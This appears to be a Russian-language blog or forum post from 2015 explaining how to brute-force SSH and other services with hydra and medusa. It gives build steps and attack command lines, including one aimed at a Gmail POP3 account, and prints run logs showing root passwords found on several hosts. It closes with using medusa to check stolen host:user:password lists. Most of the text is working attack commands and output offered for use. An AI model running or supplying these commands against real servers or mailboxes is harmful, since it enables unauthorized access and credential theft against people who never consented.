21.04.2015

brute ssh

hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ssh


medusa -T 3 -H hosts.txt -U users.txt -P password.txt -O good.txt -M ssh
medusa -h pop.gmail.com -u hackforlulz@gmail.com -P /home/HackForLulz/wordlist -s -M POP3

И смотрим как встали модуль для медусы
Код:

medusa -d

Medusa manual или брутфорс SSH!
Частенько проскакивают сообщения о том как брутить ssh , а так же и других демонов .На счет брута SSH все в упор кричат hydra , он самый лучший и самый самый, но это не так .После двух часов брута на нескольких потоков он у меня нагло падал в кору , помогало только перезапуск и если смотреть на скорость то показывал не особо хорошие результаты .Но есть и другой брут medusa , так же поддерживает огромное количество модулей к различным сервисам.
Вот список того что он поддерживает:
Код:

AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, PostgreSQL, rexec, rlogin, rsh, SMB, SMTP (AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC

Плюс к тому же еще и RDP в связке с rdesktop.
Скачать последнию версию можно с сайта разработчиков www.foofus.net. Для брута SSH потребуется таже библиотека что и для hydra - libssh2.

Качаем и ставим в начале библиотеку
Код:

wget http://downloads.sourceforge.net/project/libssh2/libssh2/1.1/libssh2-1.1.tar.gz?use_mirror=sunet


И ставим ее
Код:

tar -zxvf libssh2-1.1.tar.gz
cd libssh2-1.1
./configure && make && make install


Качаем медузу
Код:

wget http://www.foofus.net/jmk/tools/medusa-1.5.tar.gz
tar -zxvf medusa-1.5.tar.gz
cd medusa-1.5
./configure


Если библиотека встала нормально то после конфигурации

PHP код:
 configure:     Medusa Module Build Summary
configure:
configure:     AFP             ** Disabled **
configure:     CVS             Enabled
configure:     FTP             Enabled
configure:     HTTP            Enabled
configure:     IMAP            Enabled
configure:     MSSQL           Enabled
configure:     MYSQL           Enabled
configure:     NCP             ** Disabled **
configure:     NNTP            Enabled
configure:     PCANYWHERE      Enabled
configure:     POP3            Enabled
configure:     POSTGRES        ** Disabled **
configure:     REXEC           Enabled
configure:     RLOGIN          Enabled
configure:     RSH             Enabled
configure:     SMBNT           Enabled
configure:     SMTP            Enabled
configure:     SMTP-VRFY       Enabled
configure:     SNMP            Enabled
configure:     SSH             Enabled
configure:     SVN             ** Disabled **
configure:     TELNET          Enabled
configure:     VMAUTHD         Enabled
configure:     VNC             Enabled
configure:     WRAPPER         Enabled
configure:     WEB-FORM        Enabled 


SSH будет открыт , сразу компилим и ставим .
Код:

make && make install


И смотрим как встали модуль для медусы
Код:

medusa -d

 + cvs.mod : Brute force module for CVS sessions : version 1.0.0
 + ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
 + http.mod : Brute force module for HTTP : version 1.3.0
 + imap.mod : Brute force module for IMAP sessions : version 1.2.0
 + mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
 + mysql.mod : Brute force module for MySQL sessions : version 1.2
 + nntp.mod : Brute force module for NNTP sessions : version 1.0.0
 + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
 + pop3.mod : Brute force module for POP3 sessions : version 1.2
 + rexec.mod : Brute force module for REXEC sessions : version 1.1.1
 + rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
 + rsh.mod : Brute force module for RSH sessions : version 1.0.1
 + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5
 + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0
 + smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0
 + snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
 + ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
 + telnet.mod : Brute force module for telnet sessions : version 1.2.2
 + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1
 + vnc.mod : Brute force module for VNC sessions : version 1.0.1
 + web-form.mod : Brute force module for web forms : version 1.0.0
 + wrapper.mod : Generic Wrapper Module : version 1.0.1


Запускаем с 3 потоками

Код:

medusa -T 3 -H hosts.txt -U users.txt -P password.txt -O good.txt -M ssh


PHP код:
 ACCOUNT CHECK: [ssh] Host: 172.16.0.16 (3 of 6, 1 complete) User: root (1 of 1, 1 complete) Password: admin (1 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.0.92 (1 of 6, 1 complete) User: root (1 of 1, 1 complete) Password: admin (1 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.0.92 (1 of 6, 1 complete) User: root (1 of 1, 1 complete) Password: superpass (2 of 5 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.0.92 User: root Password: superpass [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 172.16.0.3 (2 of 6, 2 complete) User: root (1 of 1, 1 complete) Password: admin (1 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.0.3 (2 of 6, 2 complete) User: root (1 of 1, 1 complete) Password: superpass (2 of 5 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.0.3 User: root Password:  superpass[SUCCESS]
CRITICAL: Failed to resolve hostname: 172.16.0.8172.16.0.92
ACCOUNT CHECK: [ssh] Host: 172.16.0.16 (3 of 6, 4 complete) User: root (1 of 1, 1 complete) Password: superpass (2 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.0.16 (3 of 6, 4 complete) User: root (1 of 1, 1 complete) Password: wew33w@ (3 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.0.8 (6 of 6, 4 complete) User: root (1 of 1, 1 complete) Password: admin (1 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.0.8 (6 of 6, 4 complete) User: root (1 of 1, 1 complete) Password: superpass (2 of 5 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.0.8 User: root Password:  superpass[SUCCESS]
ACCOUNT CHECK: [ssh] Host: 172.16.0.16 (3 of 6, 5 complete) User: root (1 of 1, 1 complete) Password: support (4 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.0.18 (4 of 6, 5 complete) User: root (1 of 1, 1 complete) Password: admin (1 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.0.18 (4 of 6, 5 complete) User: root (1 of 1, 1 complete) Password: superpass (2 of 5 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.0.18 User: root Password: superpass [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 172.16.0.16 (3 of 6, 6 complete) User: root (1 of 1, 1 complete) Password: mail (5 of 5 complete) 


И смотри в лог фаил

Код:

cat good.txt


PHP код:
 [root@localhost brr]# cat good
# Medusa v.1.5 (2009-07-24 19:56:33)
# /usr/local/bin/medusa -T 3 -H hosts -U users -P password -O good -M ssh
ACCOUNT FOUND: [ssh] Host: 172.16.0.92 User: root Password: superpass [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 172.16.0.3 User: root Password:  superpass[SUCCESS]
ACCOUNT FOUND: [ssh] Host: 172.16.0.8 User: root Password:  superpass[SUCCESS]
ACCOUNT FOUND: [ssh] Host: 172.16.0.18 User: root Password:  superpass [SUCCESS]
# Medusa has finished (2009-07-24 19:56:42). 


На бруте SSH он не останавливается , им так же можно брутить и фтп и рдп ( имхо не особо порадовало , очень много пропусков из за того что патч для rdesktop не поддерживает ответы системы на языках отличных от инглиша ).

Как оказалось , не обратил внимания , она еще и без проблем чекает акки , то-есть какие модули подключенны те и чекает , в том числе и фтп и ssh , мыло и т.д.Но фотмат записи другой .Содаем файлик с содержимым

Код:

172.16.0.3:root:superpass


Формат файла может быть и таким
Код:

host:username:password
host:username:
host::
:username:password
:username:
::password
host::password

И запускаем medusa в качестве чекера

Код:

medusa -M ssh -C hosts
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 172.16.0.3 (1 of 1, 1 complete) User: root (1 of 1, 1 complete) Password: superpass (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.0.3 User: root Password: superpass [SUCCESS]